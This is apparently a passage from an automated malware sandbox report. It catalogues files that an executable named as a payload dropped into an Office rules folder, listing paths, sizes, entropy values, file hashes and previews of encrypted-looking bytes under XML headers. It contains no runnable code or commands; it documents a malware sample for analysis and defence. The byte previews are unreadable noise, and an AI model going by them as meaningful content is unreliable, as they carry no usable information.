                                                                                                                          Preview:<?xmlkP.......U..{:...x..w4..p(:Z.%K.....lO4...OO.>....OD.3.......a..J..N.Z...(]{X..\b.i+.4._V.cm.z2.../.|...*..Z.......<OeA?.<.y..B?....b...s./..c..@.g.I5.@.0<......IMv....J..|.....Y.QLPT\.5...$...X.o.m..X..9&.P..P}..?}..B%-4..&..XuUj.....e.......d.....v.....?..eS.J.I....m....1`..lB))D....O.....y=yUrw<W...F(...%..OD...h.-..#.D..R3......q..T..mu*8..T=.j./.N....a.+V..u.DIB....Y....&.j.Kk&.......".....7.N..aH..3..........,......S{f.D0kth..m.......(.9y.1.Y:r...+m..z.dK..{.Y..k.EQ.t.8j.&.]...t...I.!|..i5'..M.k...vV.17.!J......7e..D...s~....C.M..g.._...G...>.M....j..C.......3......r....3v....G....?..h..............C....X...a.....rMTW5.....T...'S...h..T.[$..#t.^v.m......X=.B.P&.....=....0...QUN3.l...?....Niu,A........F..\..n...7R_.%A.jM[J'NlFh.....3.D|..{.y..7......&...,....&...P.2.E...xi7......CM.AU..Q.z.......$....<P...A.kB#........`~..V.F.%<|..0x....K..0.3..DpJ..v.k.,.D.'w.JC.9.}.T..v!..`..k....!.O....{.Y....j.n......C..k..)...].P.7.mA..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701801v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1736
                                                                                                                          Entropy (8bit):7.894871867334058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:+3+OH4wxk5tPIuswFZn+WC8P9iNSKUqz5J8D:/i4F5tPywFZt/iHtv4
                                                                                                                          MD5:3ECBF82C5D6D3AFF526390342A76A396
                                                                                                                          SHA1:41AEE9C9E23015EC813B1A34532B78F7F9CCE6F3
                                                                                                                          SHA-256:A74B4852DF4140EF83E62E626AEB17EAE993FDE4DB8F220B0C6201E36E8DFC9D
                                                                                                                          SHA-512:73CA5300A7BE62B228CB9CA1E03029C4D535212D946C21C9AB62B08C10E63E058AAD6780311B62F547DDAC13149019CAEE661C4C68E1DC5AF466E0FAFA8ABD0A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmli......3J...........QY.*.V........:fO.@....0......YvU../}8O...N@........^.....;_xE.".5.]aE..t.2.%.M.;....ttwUy...g.*..V.........0.x.%xEI.m(.....#X.>y..|..l.....I.o.C..#(KjU......^....9...z.'r..HT..8...8)...k....X.W..(^..M._...G.Th.(..V....o...v.R..>..p.-....`...........r.@k.tf.le.k.x.t .=...u.Y~.ej..<..q>.8...[s^."/........*..1xrF..1..[..t.4...>..z-+...aYw@.N.M.c.`.m.{..J.W..A.....l...G<...z...`.g.|~I..h}:l..?...^..1"......Tiq)R.&V.?S..l3..?.FH.Q..dv...C..'I.....04...|..rN.(2..6j:..9...r...>D..dN.'.&.-H.U..R...yJ..]..M...q..D.dz........z......3....b.Y..&..i.v9^a..b..Kc'i...GU-u-.{.kl.p..H.....\...]M..Y.Q..x........I...."EW...7..l.X.9_FHC.<......$.Y..)h.31TU;..g.G..A.........t.Fn...m.._.........VD..U.....;oj...;..G.p....r....J}.".....z3.......W...:B.............,..(..T...$v).."..r.....w..#(..v6.....X{......Y_.@.Nc..=.G...+7.&t.Y......4O.e.UDE~."..b..3.X.......)t.........."W...............,..........Z..:..j'..w...5C

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701850v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1704
                                                                                                                          Entropy (8bit):7.886164047794014
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:hAxIQhaPFPrH2nc+EqEfM/33wmSGHPNNcxfzEzWYGwMyjJ7PEqdcFfo3LRwdpdY8:yxd+FPym63Ah5zEuj4Thdc4RwelZYnbD
                                                                                                                          MD5:08760C81935B030C0E31C4D168D9EEC2
                                                                                                                          SHA1:C8E332A074325FB2298EB0BF621B8FA5118A5AC4
                                                                                                                          SHA-256:114D4696C2D96C2308823797BD5CF1F13E73434323D0045250EA285C7EAA8F60
                                                                                                                          SHA-512:55E34E97C0A3469FCA934A9CA975CC34316A38FCFEADF4DD7657B1A6CA7BABC295979959F441D6728B44A06AD9CB8A6F05467091661C9BE696C78A4E0CB6E2BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.........r(C...2E..x.P..Z.5....(..#Q..3..P?R..,.3......w....M..DkkI..tz)..K...*...p..*.1.L......M=RkK@.m.\.$..'....2...!.t.....Y.....^p..{.5.oj:...^.pt...W,..B.)Yy.....1..C!..(^8.G.....O'......O.o...d......C6.....^...t..6....I3....._...p...$...*..}h.Dy..........U........bi.I.......M...9../M.`...m.e...11.k../,..;...k...gj..;.`../.....:W..4.f.<i..G....d$..~....q...Q..e.U:h^....t/.,...7..H.#..............Ci.0..sV.......)..*..=.....F..|...@..(..~..vm..^...u....a.l....2...x...V5ja.:..'E.......d.... f.B..a...0..v...1J..n...4.U..Dq..s..A.!bv.....H.]..e....5y=.}......v(^.(.....\.<2..4.U...u.z.a2.hh.L`...Va..y.v.....5...v.a`.O..U.\h.,a]|....E(...O...R.^.F..R......K(L...6Uc..E...hZ...>.1 k..0fCT...p....{D...x..3....x..r'H`...Ci..k......P.e...x...w...}."0J.q..#j.Q X....b..;a.!.^(.B...)LF.. e\..?~.....o........V**.z.....0,.Xi...d..H.LD..7=........-P.....$.....c..m..F...R.....tR..k=.hS...Q.......,D.i.. bw....x,s....8-...7`.......!..j...TGY.D".

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701851v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1741
                                                                                                                          Entropy (8bit):7.893322855069261
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:TXlkzXBONjjzf+RxudN6Fe6u68l2UHUTSzD670D:TXi9OFzf+RKsetpldUSD6c
                                                                                                                          MD5:17D84DFBC1951CFD9CB6FC639365B0BD
                                                                                                                          SHA1:2F7DF75FF4A32B9B2083CD66600CD68849A31E00
                                                                                                                          SHA-256:7FE7246663968FFBD52EF22AE14B99B3E91BCE61993FE9097D46868C520ACA2A
                                                                                                                          SHA-512:124913701FA8445FBAAC0CE6E13DB40CF55F77A5CE9DEED0FC2F8C73076F3E300E392674AD67801BB2B19D0D00F199A517434FE98D9D8F41A356A78CC40DD870
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml)e...u...H9Yg.M..*S3.$.2V`.|Q..'..=...~......Z.G.K%...|...R.&.Ci]rO>>[..-.H...6=Em...r}...Pz.w..Z..'M{M.."....t!>..{.%k.........d.../p.^F.I.....f.}.=...Z^N.p:...|K..A(4x...B,.I......G..d.0j...=.@&.........s..1Kl....>sJ.i8...";....m....mvb..85./...... ....*..@)8.......8..NQ..l J.l..C.........t.w...Nm..j^Q~ ....s....:.!.o.rN...^..Wy%.Q.$.L....i..l.!..K.@?.~.=.. mZ.._..@.|l}b.~......&XJ[.G_.8IHf.V....C..c..e.Lq!/.t)l~..?../'.S)n.F..DX..O.N.c.a......Z.ic.........(.7.c...-..p3........oV...~.j.......M...,.D..k^..k.s?..Y..h.ME.8{...?...9......N....F.1:.=.......D...[.\..%...._....cN.W...S..;\...0.#*6.c.V`....9oZo..w....|9.I(o.*.*.a*.|g..ox4....x.\.....;v.v....~v..t.....$...y.g.....O..&...z..cO#v<...$.g.q..f.R-.V,.!....o...2Ex..n/..../]p..D....%..*.*JSv.....3..5P1.."......AS.t>Q~..Wb.@...G...9....%...4.......e..z:].>.$..WA.+...h...W.~..f4.6.-..,A{m;....6..R.2.4.2......%..;.O.......4.:u.....U...{.C2..t@...T-....KX.6[.]wQ...V..$...1y..A+...kI..R...C.k4

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701900v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1703
                                                                                                                          Entropy (8bit):7.885106301400302
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:GaKcH8T33ZZjvK8EoxG6axCgad/eK1HZD:JDM3ZZTooo682d/B1x
                                                                                                                          MD5:44FB5B14C274B4B45807CDD87B49A32C
                                                                                                                          SHA1:66C496949464EB8B9A1022A936FBB029A07C3355
                                                                                                                          SHA-256:4FC1827D3EB7E4E4D0852E5CCE5F5D9129E83E55B203B0FF4E0702AFCE9B8133
                                                                                                                          SHA-512:3F591053D5FD105D4E8BA692C63D577B5A73292AE8B5D845B750FFF77A9D621BE16FF6F065BB60A91916891C0347C03D83A4783B6DAF53E253C17DB798F45102
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml0.[eoH.../.l.Vr..w... ...!.`.....]......}w...>..@nS.='.4..KV...s.d......rd.P.p...#.^r0...nl.T........3.v...0EJ.~@..H}...Z..G.........%.,.{BOL....7.l.N...`..f.....s..| ...z#D..<..u.....2.#dc.u..t.N..)z..u.6.$A)."..9..d.........J{.....Zk...^P...tn./... .!~.l.P.;`1.i.....#..e.{q....r.nc...STu.i...l.[.2...u.J1...]Xq2.,.(@f...*),\g...I.P.......o...,.....W0i..!...v....Q..Fsdi'.....b..U7..7..e.....'V...a..B....OP......"...z:J.*.^7.[......H(..X..3{~./E..w.~.>HJ.=....V.WK`W.o.ow....S..`...$...j.v....p}..s].Wd.\.e...H:..k`O..3.p.'6..].......k.......5.\^..^g..]._/..|...n!...9.dF...?`.WD[A..^.L.eY..........K.c.......2)a........eL..AM..*.."....!.].....NmL.*.p...u.7.S.L..c..(......W....%!.../.p.....G8...R.6.Y.d.<..x..p<.?..u!0.....y........~4...%C..,=..Hr..._P8.........?.n6..iV...bl.J....k.h.H....tSX.....f..|...,...L..!..O[..X..:R:}...q....5..&a...[.!..uN.~..qe.|.WU...y#4<,.@1$um..l$+.M]....?.,U.....2.c...R..... ........i4$da..D,l.C_..D<.X..5]$K..{.@.~

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701901v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1740
                                                                                                                          Entropy (8bit):7.883288318192607
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:CESbk4tiKN3E43QyY7nWU/81LjyPT3KJRUvup6bafHWwjBYIFD:CEKfd3QPnWU/81LjUrvugGfljBN9
                                                                                                                          MD5:8FD13A4B5F50A135268E93AB539E3AF2
                                                                                                                          SHA1:D440258E09ADA2B781B3699E9DB53BAB3717D787
                                                                                                                          SHA-256:6BEAB5D3434D1432E038B0654716F32A167A36302209BD3FB7E3E17CDF6EB308
                                                                                                                          SHA-512:9C0017DC3A91ED9ECAEE456D7653FEF6A7E233DF82D26517DD937273257DEFFE27DB4814B9DDAEE9F811B24D00E4F2F2C33F484AFBD0F43C2F2CA20ED92F80CD
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlL....v...;.$...... L_2~..h.,..._iW..c.@..xK.>b.ZH.6..T...........lb.....f.gZ...3o...V......I.a{..U._.I.....o..:J..F..^..1...{|n....%k...w.?.Y.d>....T/..[....?.....=a,..]..5q......`....w......P.[....*./v...+..T......(..<^8IP.\......!D...>x..Au..t-..i..p.).z.k..:l.;..U..]._.2...p@\.T......c.L..O.R.i.Y.....qV... ..R!x...K.I..T.0..j`.h.F.......t..8.H~5?..#....{.....j..D....k.R..~......%0..=U.....6........G.).i..E...G..@Pu.f..0.....k...`.2.J/.h...._<....vA..CG....;..L.....Xw.}S..#..#..Bs.67.#.|.l....2.v.....4~`|....f......gS...G.......e(..w.....I...U<.......@~.i....".Y.....}>*.L..P...../.qF.!.5]/..n...l3.....9L.&..E36.....zN.....A....]...^.j.~....ff.tY+s~.p..../..U.G...s..s....:z.|g..5..P ..f.w.J....2...8....0....K..w.u.k..../..$..6.(.7.D%.........Q..:...&.Oj...._..e.;...r..D.F........|<..c`..Z6c..94....L..a....GP..).....`Pf.m..!.fzt..0.9x..2.d ...q}. $......uYK&.....L.(....\G.....^8Q...X.q..~..v%..3.{.|...h../!.s../mSwv...^.T.}]^.sW....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701950v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1713
                                                                                                                          Entropy (8bit):7.878847449881916
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:in/mt9iqwDVz7zj0a9/lweO7rFwqA8alGFD/yckaNyOUpSYOpVNMD2iCpbD:PL2Vz7PNmeOdwqIlqD/yrOYSfpV225JD
                                                                                                                          MD5:2BBCF1EF7D79CE424063FDFD5BA15A9C
                                                                                                                          SHA1:9592ED4734A2FCA6FA8D4EEC3C96E4073E29E8C6
                                                                                                                          SHA-256:6B9DAEBDBDBCD0BFE0E782FB81350730043D1A8B775CEFC05F0B41A8A0245E0F
                                                                                                                          SHA-512:342AF0B003C7CFCEB270959E08DB155F4623A7AAD196E7C58774C7A9FB4FD2C4CF989F546F66032012831D5E10AC167323EF9B29B312F4F0F25A5FC9F4585725
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...xE..6~..We..s.%.(.P..~H<@..:.>...q...O..3.cA...v.b .s.h....[....K.D..n.%z.".>7.&3..=.7FV.C.~.$.Ld...f+....Z.a....t..>(......>..0....[..~ ..!..9..5k=.......ih...y...7...=W.>L[..c..W.v#|.\<&E..X.".....B..?..t....bN..$...%...;.W..9..^.....b..fN.I.........&.....$G.y@........._._"..]K...`0.7.&:Z..&.. ...*5.l...x.2.SB.....Lj.qAE..7.;.=.......5'./.....r...U....].<..p..;..cY..F.a.<w.Q....b.I............9.n...\._.A].j>..q.Y.{#...ZA.j..B* E...[p..BA.j.K...q.,%.R..3.......4....2`=..8. .>?G.<..2]..=eD.5.v.7.3..J.<..N8Du..8.-EU_.2..?._.$0.gjp0.C..F..yw...Y74.^....<+.'WXi..v.R...........=..,..OX...D.W..=...#.W...7..........l6u}..bGF.{L..9...=.T...E..{.b.~...F.+*........^.].:.q2%........6Q..&..Y....F..t....a<...[....T..f..F.^SP..j.,#.....i..S..MG..u$~....6.,>.Yu.....)vZ..Dl./..7.+yc...BX.(#.L.x9..&.cJS.....U..l}..%..OS@..|i..../+{......B,.;..\..9.}.Z]._:..nZ.."@.n.#3wb\8.b...!...|......bs$....w&H.9..ME....w...E..o.....V.}....<.4..d7....a.W.q

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701951v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1750
                                                                                                                          Entropy (8bit):7.896964368836441
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:QJqwRj0LNISv2Ilyf88KYY0fEjIPRa0+aM+DiBWCD:QJq/NISDwdK2g8gaM+Dml
                                                                                                                          MD5:CBC2CDB376CE6A9227F4323C8EF92389
                                                                                                                          SHA1:BA35812CE890F4259A73AE2775B467B33EE11F22
                                                                                                                          SHA-256:BD1B9D8FE98D1F5A6B8CD5F87EA6022F917C487DA8E77F257FDB7A217640C04F
                                                                                                                          SHA-512:4C84116B0E16D3C05645AF27D72FD0218D21314980F730BD31578B7849BE9EFAC22E40C9174ACD39E3EECEA6F8AB29C36CABD9E632E05DB54CDE5B90D5148D11
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.ZX.g.3.e.?.|Iz.N..0t...../..E..H............};...x.._.;.Q)<..P1L4...b......((.H...2.. `.M...jt+e...1..]/......;.s....2Y....1n..].l..\._. .R...M+...nmo..j.n.L....0....4.[._......8~@..D. .`}.,0............a..f.]M.a.?E..n$x...s.......&C.X06I.,.....M.n#kzd....%..;.Y...!.. .3sC...|.aOe.N.m...:.h.......'0gpO%.T9.....k.q1..G.W..."....<,}~.vdc5..$EXx.f]....4].X..b..3s..e..E.?.8...qL9........V...g....;...[a}.AWB..X".....{W.k...sH..q.../n....w..:...'MR../.Cf\.;....U~C.0N.Q..R.4.%%}KM.4.L......e..'.m..,.."....H\R...c.b........{...Xn.|....n.4.nZ.+.)...U.j...y..-).I..w..Xg..)%.I..T...I......m..*....w` Y.......h..L.;<3....r($.3v.M/l/......K.&.Q:......p...\@p._.S.dl.F.H.}.@...b?....d+....3I^...........O..O...!...#.4.......Tb4.#.8......B.....gm=+/.B.....a.^.6Z....BG...s$..e..s.}..O......d...U.....U0w._O49.[.....U...0...I.L.O...@...<&.m.o9L.Q..._&b..Y,p....y.Mmwc..N]...i..v.f'.....PF.:...qP.o}M|..Q....a'....GY.-n.........ZV.......]...1.........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702000v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1693
                                                                                                                          Entropy (8bit):7.8724540676364905
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:eVXSOtuVKGvLRXksZXEZpHZRZV7+pOaMj/tWD:eVXSOtGvtVUZpHZRZ0ig
                                                                                                                          MD5:CB3DB23AF61A3CECD1361AC3231DD7EC
                                                                                                                          SHA1:D88C31FF55684F58ABD4E3E7BD93D2664B55E97B
                                                                                                                          SHA-256:DD7B29D6E5F61CE2AD39695AD71E7DDCBA281F1D97871478187F233AAAAD6D42
                                                                                                                          SHA-512:9F0F3B99BEBDD43E348D7DC0A879DB9040BA6451590F4C6664F7A56352ED9A3A0A81A3A4417E540F3ED0E41F37FE84A67E0D80AF46E9F7A582554F3388885537
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlK...3z..|%....V...h$...9-s.Mx.(].M.Qs.Vi......]..I......N...5l../.~.G........GS...h5.(....'..k.[ZT..........|s...G.M..74.1:."..<.b.U[.u2BH...J=..*...]8.u.....K....AG......?..ZE..7.1\..7z....P.....~H...t.MF..~.'=DG.?C,..F.)[......6. ....5.... .p..!. ....*;..b.....O8..X2.....c9..[......xS\.#Jh|u..Q..WBMKA...E....t0.2c..{...B.q96,z.L i.N.\....,.=3..........{...U6....2.D.PV.f..X&..VG.#..=.....B...../..6.p'.M.~.<...........Wn0.&.......O...:+..JHd'..h.N...'.x4.Hd......R/z...b.7sNBc.b$..i...!...}....3.m...*E.k...../.:xe.i'..Zd....V..s..8.}6.!..`.L.5t...z.$....H....J."..[j.7.i.....m....w...}........?...A/@.F..Rot.!.qes...=^.<...1c.9..F.z.Y.X'..G...N..kG.:.(?<.....^kC.$.caV.[f.X.f.g..!..e..y.q..,...AL.8..i."M..E.I...3..Ji.N.=;.....(..1j....K.6..qd.ob;F..|...J..,.=N.xX.....3.ni7...]..v.[....s.!..F...y.l.{.."....k.E...!.6X.6+..g...)HK.T..t0.%..<oq.'Sw..6....J..V.v..z<...gr=....h.T..W.U!0.f..2.#gi..:........x c....5[/...Q....\..h.R:IT.s...n

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702001v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1730
                                                                                                                          Entropy (8bit):7.881439606420662
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:fRU7iArz7PN7tp3OQ9SIdv19GM+ooZOalp+AENnWJD:fRQ1PN7tIQ9SIdN9GMDoZOaT+ANh
                                                                                                                          MD5:391B754F045D566E7CD4396607F148D1
                                                                                                                          SHA1:946B747E5BDF47749FAB9335286BBE7DDC098A72
                                                                                                                          SHA-256:AA9F4553EC4F12273B336FE7E4B566B6E016047B190E36D59358581AA3B8CCDC
                                                                                                                          SHA-512:8E1351399DBBABB46063A69FCEFFE026E1B6BEE4FDB92B02119BBBB06919A4060D44E3BBA2ACE793291D1E00273B03568145C51743B7D01E14D1A12AA7D8CD4D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml`..k.!..7!.....~..#.I..."....j......Y..T.6_1..z.MoIR..g...........|.,...1 ...9..R].j/.*..Z2..a.g3..N..6$.>&......c....d.g.k....7.V_..G.N..?wV.{).L.........Q@P..zZGg.J.0}...ML.S.zT.@;|4.........^r5................P}O.`.v7W...R...aH...7..7n....AQUY..j......+....,1X..|.U'r..mx...s..!.C*..?. .E.B...y.g...L....H..1.V(..V..)..;t...`.........^....M......3./....4[f..&...>E:.2U...GW..H.peQN..K.ilSY?1.<.O..M.wc5...Q}....F...*0.......) ....O.%...>b]..]<..nz;%.pK.U..}d;.*...#.2..Q.n}.3../.9.F..T%Zn.p..E.q..-..P..IP7B&.m.....y%.......!.6v.i..)..wA..>....@...@.v.....N...D..Kor..U..j.I...#..{5..<....9......V...).B+.{...9..........A.Mt..v.a'W.....~..[-..........\..h0.....cW.....t..P-..P]..]..w$.h$...XT@...ucr.j.T.I.!W.8`m...w),~N.I.n+.0.G..._T..`"....Q.y0o.Y=.M{.Rc.Te.\.UI8.c..:d..?_.g<....|..J).r?.b..B.../.6.O.....m....j.S.@.......+N\v....]Tz.d...M.Dg......7.......7.......*...I...2n.n...?E...P..yt6...s3.P..2.LudO.p_..D..o...g{y...&.6..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702050v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1697
                                                                                                                          Entropy (8bit):7.891173632432672
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:cGqF3TL1sdWi9ek9FGx9H8K6qQW7J0JairdPD:w3TKb59FGxx8Rg7iJdrdb
                                                                                                                          MD5:7602819A4986A5D2C9C86CD60B4BB91B
                                                                                                                          SHA1:C5CB0A570B3CB1485D16FEB098F6A1476D7A7E1F
                                                                                                                          SHA-256:5F5C807F0359E8C4E8A617330FAE0109F84AE5015AEB64831C694006D8427835
                                                                                                                          SHA-512:BA06236A5C45206610232CFD04B69CA7DAA5290F2F11E05D3F9EA5F585CC322BDA71A982BF2CEA0A47F598E5AA4FB593FC0CA8E1C11E11333B5A07ADDF91FD61
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml"B.:}}..?|M.I..H....#..3..W....oZ......P.e..Z8...A.u#(+...W.Z.....20...I`.@....lS....W2..Y..5...<......k..6*.....J.7..../N.Kt.#'.m.;}.KvIE.......h...D.._.=...........G.q....R.[...n>p#...A....s...#.t.......82.zR..&.V.u...o.EWn.p..b...Y.........pu.c.K+..X....u}*2....E-).....|.%f{...x^.......!/ve...........c....j.e.....rJ.Q"....^...5<....]l...U..p...R..QD....pvg..w.. .|...c...ZQ#"..{vP.Q}...a..........g...Y........Z.Q....Kn5j(F.I...q.N...f.*!.6..."..tK....@n...|.5.`.Ng3....E.f............h..M*.......x.B.F.j...K.3..l.\..K.,P.L..".5.U..l........."...'.x...V.J.....>..i.D..c......`ot...P0.....<....F..e....1.!..F.0)..].......#.Mg.(p.T..}..S..G^\.....]...5..<"/.u\)P......f..3._.........fd...$.......t......~.)../...>....8ZA.BiozZ-x3.......Zq%.kb.NZ..SZR.....I.=g...y....~..L@4.'-0.J+.x..v...A..p.i.m.+..g.G=.;M...#....).b.....A....N..d.. .HQ.....V.0.O:+.9..Hf....44.]N...).%..lGx.........hz.......L.h.!W..+..m'..$...P..A6.z3D..P2.R.\.......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702051v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1734
                                                                                                                          Entropy (8bit):7.889056445936229
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:LiauYLlMwMeemYjcFZHPyxjagq0EGaRK/S5M9A68VD:LYeMQBvyxja/bGPEF
                                                                                                                          MD5:F582AE67DF8ABC44F0794706B006B7A5
                                                                                                                          SHA1:5F15B5FB1A9CE40F24E9CBC18FBC5BDD4C122546
                                                                                                                          SHA-256:DA44B6C291EDFB85F8D03560B365C2978CDA855751FCFD98CBC0A7061A7A934A
                                                                                                                          SHA-512:ACAD30D3DFCBA456095A93158D6716DBEB8F4A72FB4F52592BA279CBAD3E230B0C8F8634A458DD0C620E0C034FCC30EB2959459F2CAB1A26906900A90C5045A8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml;..;a..I.6*..T.8...0.....-Z$...j.-.^.q.....^...+nq.O...t ..E.NrF......U*.r. $.T.Y...M.Z.Q.cuo.4. ..{[...+..O...,..eovY.Jm9.C.s.{... {.t..[.S.....yKy..4y.{pa....L..z.8+E@..m8.=:..,..l..%%... .J...kA.......1..{r..V.?...&..b...q.....bxv\.,^. v.,...7.M.n.U.......).l_.J.?.._.z......)%..~..P.F........_..p.....Q...k.3...S..,o....}x...^..C.)...z]."k.F.n.2.<Xg....^.E.d..............A[S....$..]..v.2.=:...N.,";r.......#F.J.l0....b..a...8b..........L...0..n1..._.'..............{..Xj.<MF.U..jR|.md....*&.9.......I..........\<?oJ.M-.7H....%..>@.Z.7.rb*......u.C..+....0.*q.*.....z.pT..[c..~...Q.jipH...;.G.z.q.^.SXTe..Q@..zv1.~..l.w....."....{...4;....R+.......&./.}.c.&... .^.....,\.B....!.qhd1.kM.6.. 8...Z9.e...2.XM...O.....SC.Z...jF.P....o...W3.1....=.\a/u,....=Is...`b.Y....3.`$F.H...b}..O.~#.Q.5.|.,.Y6J.......D....=...>........Y...5=Ki...g.W..Q......b. ..........l..?K..4.p..p..d...j.L h9.%Fq..>.4.9.a...\...}.U......~.N|.H...@.j B .6...D8".,

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702100v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1704
                                                                                                                          Entropy (8bit):7.886485725899217
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2JFsXO2xvO0Ichr794glNPLR5j/JoZAC8xcP/b0QVdFcM0D:Te2xGw79nLVoZucXb0JMg
                                                                                                                          MD5:9533F1F307CC9AFD72270AE15A2ED334
                                                                                                                          SHA1:07484F2B7997740434EC0FB98245D848877BFF05
                                                                                                                          SHA-256:7A98E2B49B72CB4F22CE19F9FA406A683D55BF711BD45F41F7F7F1BBE56C71F0
                                                                                                                          SHA-512:F8C66739D25FFDAAE1131DE955CFFB304286C85C104CD3099E0016F252942414D7FDA26618B1711F1DD86AD996D9E0EE6B29417A95AB25A3EC97D9E1AB0FD961
                                                                                                                          Malicious:false
